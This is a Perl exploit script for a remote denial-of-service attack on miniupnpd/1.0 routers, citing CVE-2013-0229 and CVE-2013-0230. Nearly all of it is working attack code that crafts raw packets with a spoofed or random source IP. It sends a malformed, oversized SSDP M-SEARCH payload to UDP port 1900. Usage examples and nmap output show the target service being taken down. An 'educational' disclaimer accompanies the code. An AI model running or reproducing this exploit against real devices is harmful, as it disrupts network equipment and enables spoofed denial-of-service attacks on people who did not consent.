#!/usr/bin/perl # # miniupnpd/1.0 remote denial of service exploit # # Copyright 2015 (c) Todor Donev # todor.donev@gmail.com # http://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # # The SSDP protocol can discover Plug & Play devices, # with uPnP (Universal Plug and Play). SSDP is HTTP # like protocol and work with NOTIFY and M-SEARCH # methods. # # See also: # CVE-2013-0229 # http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229 # CVE-2013-0230 # http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230 # # Tested on # Device Name : IMW-C920W # Device Manufacturer : INFOMARK (http://infomark.co.kr) # # These devices are commonly used by Max Telecom, Bulgaria # # Disclaimer: # This or previous program is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use at your own risk! # # See also: # SSDP Reflection DDoS Attacks # http://tinyurl.com/mqwj6xt # ####################################### # # # perl miniupnpd.pl # # [ miniupnpd/1.0 remote denial of service exploit ] # [ =============================================== ] # [ Usage: # [ ./miniupnpd.pl <victim address> <spoofed address> # [ Example: # [ perl miniupnpd.pl 192.168.1.1 133.73.13.37 # [ Example: # [ perl miniupnpd.pl 192.168.1.1 # [ =============================================== ] # [ 2015 <todor.donev@gmail.com> Todor Donev 2015 ] # # # nmap -sU 192.168.1.1 -p1900 --script=upnp-info # # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST # Nmap scan report for 192.168.1.1 # Host is up (0.00078s latency). # PORT STATE SERVICE # 1900/udp open upnp # | upnp-info: # | 192.168.1.1 # | Server: 1.0 UPnP/1.0 miniupnpd/1.0 # | Location: http://192.168.1.1:5000/rootDesc.xml # | Webserver: 1.0 UPnP/1.0 miniupnpd/1.0 # | Name: INFOMARK Router # | Manufacturer: INFOMARK # | Model Descr: INFOMARK Router # | Model Name: INFOMARK Router # | Model Version: 1 # | Name: WANDevice # | Manufacturer: MiniUPnP # | Model Descr: WAN Device # | Model Name: WAN Device # | Model Version: 20070228 # | Name: WANConnectionDevice # | Manufacturer: MiniUPnP # | Model Descr: MiniUPnP daemon # | Model Name: MiniUPnPd # |_ Model Version: 20070228 # MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED # # Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds # # # perl miniupnpd.pl 192.168.1.1 # # [ miniupnpd/1.0 remote denial of service exploit ] # [ =============================================== ] # [ Target: 192.168.1.1 # [ Send malformed SSDP packet.. # # # nmap -sU 192.168.1.1 -p1900 # # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST # Nmap scan report for 192.168.1.1 # Host is up (0.00085s latency). # PORT STATE SERVICE # 1900/udp closed upnp // GOOD NIGHT, SWEET PRINCE.... :D # MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED # # Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds # # # Special thanks to HD Moore .. # use Socket; if ( $< != 0 ) { print "Sorry, must be run as root!\n"; print "This script use RAW Socket.\n"; exit; } my $ip_src = (gethostbyname($ARGV[1]))[4]; my $ip_dst = (gethostbyname($ARGV[0]))[4]; print "\n[ miniupnpd/1.0 remote denial of service exploit ]\n"; print "[ =============================================== ]\n"; select(undef, undef, undef, 0.40); if (!defined $ip_dst) { print "[ Usage:\n[ ./$0 <victim address> <spoofed address>\n"; select(undef, undef, undef, 0.55); print "[ Example:\n[ perl $0 192.168.1.1 133.73.13.37\n"; print "[ Example:\n[ perl $0 192.168.1.1\n"; print "[ =============================================== ]\n"; print "[ 2015 <todor.donev\@gmail.com> Todor Donev 2015 ]\n\n"; exit; } socket(RAW, PF_INET, SOCK_RAW, 255) or die $!; setsockopt(RAW, 0, 1, 1) or die $!; main(); # Main program sub main { my $packet; $packet = iphdr(); $packet .= udphdr(); $packet .= payload(); # b000000m... send_packet($packet); } # IP header (Layer 3) sub iphdr { my $ip_ver = 4; # IP Version 4 (4 bits) my $iphdr_len = 5; # IP Header Length (4 bits) my $ip_tos = 0; # Differentiated Services (8 bits) my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits) my $ip_frag_id = 0; # Identification Field (16 bits) my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits) my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits) my $ip_ttl = 255; # IP TTL (8 bits) my $ip_proto = 17; # IP Protocol (8 bits) my $ip_checksum = 0; # IP Checksum (16 bits) my $ip_src=gethostbyname(&randip) if !$ip_src; # IP Source (32 bits) # IP Packet construction my $iphdr = pack( 'H2 H2 n n B16 h2 c n a4 a4', $ip_ver . $iphdr_len, $ip_tos, $ip_total_len, $ip_frag_id, $ip_frag_flag . $ip_frag_offset, $ip_ttl, $ip_proto, $ip_checksum, $ip_src, $ip_dst ); return $iphdr; } # UDP header (Layer 4) sub udphdr { my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535) my $udp_dst_port = 1900; # UDP Dest Port (16 btis) (0-65535) my $udp_len = 8 + length(payload()); # UDP Length (16 bits) (0-65535) my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header) # UDP Packet my $udphdr = pack( 'n n n n', $udp_src_port, $udp_dst_port, $udp_len, $udp_checksum ); return $udphdr; } # Create SSDP Bomb sub payload { my $data; my $head; $data = "M-SEARCH * HTTP\/1.1\\r\\n"; for (0..1260) { $data .= chr( int(rand(25) + 65) ); } my $payload = pack('a' . length($data), $data); return $payload; } # Generate random source ip address sub randip () { srand(time() ^ ($$ + ($$ << 15))); my $ipdata; $ipdata = join ('.', (int(rand(255)), int(rand(255)), int(rand(255)), int(rand(255)))), "\n"; my $ipsrc = pack('A' . length($ipdata), rand($ipdata)); return $ipdata; } # Send the malformed packet sub send_packet { print "[ Target: $ARGV[0]\n"; select(undef, undef, undef, 0.30); print "[ Send malformed SSDP packet..\n\n"; send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ip_dst)) or die $!; }